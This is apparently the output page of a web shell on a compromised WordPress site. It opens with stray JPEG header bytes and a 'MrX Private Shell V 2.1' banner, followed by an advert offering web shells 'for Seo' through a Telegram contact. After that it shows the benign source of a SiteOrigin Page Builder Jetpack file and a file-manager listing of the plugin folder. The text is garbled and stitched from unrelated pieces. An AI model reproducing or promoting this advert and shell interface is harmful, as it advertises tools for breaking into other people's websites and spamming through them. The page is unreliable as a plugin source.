����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Prevent Photon from filtering srcset.
* This is done using a method to prevent conflicting with other usage of this filter.
*
* @param $valid
* @param $url
* @param $parsed_url
*
* @return false
*/
function siteorigin_panels_photon_exclude_parallax_srcset( $valid, $url, $parsed_url ) {
return false;
}
/**
* Prevent Photon from overriding parallax images when it calculates srcset and filters the_content.
*
* @param $skip Whether to exclude the iamge from Photon.
* @param $src The URL of the current image
* @param $tag This parameter is unrelaible as it can contain the image tag, or an array containing image values.
*
* @return bool
*/
function siteorigin_panels_photon_exclude_parallax( $skip, $src, $tag ) {
if ( ! is_array( $tag ) && strpos( $tag, 'data-siteorigin-parallax' ) !== false ) {
$skip = true;
}
return $skip;
}
/**
* When a post is copied using Jetpack, copy Page Builder data.
*
* @param WP_Post $source_post Post object that was copied.
* @param int $target_post_id Target post ID.
*/
function siteorigin_panels_jetpack_copy_post( $source_post, $target_post_id ) {
$panels_data = get_post_meta( $source_post, 'panels_data', true );
if ( ! empty( $panels_data ) ) {
add_post_meta( $target_post_id, 'panels_data', $panels_data );
}
}
add_action( 'jetpack_copy_post', 'siteorigin_panels_jetpack_copy_post', 10, 2 );
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| js | Folder | 0755 |
|
|
| acf-widgets.php | File | 3.97 KB | 0644 |
|
| amp.php | File | 297 B | 0644 |
|
| error_log | File | 11.36 KB | 0644 |
|
| gravity-forms.php | File | 731 B | 0644 |
|
| jetpack.php | File | 1.35 KB | 0644 |
|
| layout-block.php | File | 4.82 KB | 0644 |
|
| lazy-load-backgrounds.php | File | 2.05 KB | 0644 |
|
| polylang.php | File | 308 B | 0644 |
|
| widget-options.php | File | 1.04 KB | 0644 |
|
| yoast.php | File | 2.56 KB | 0644 |
|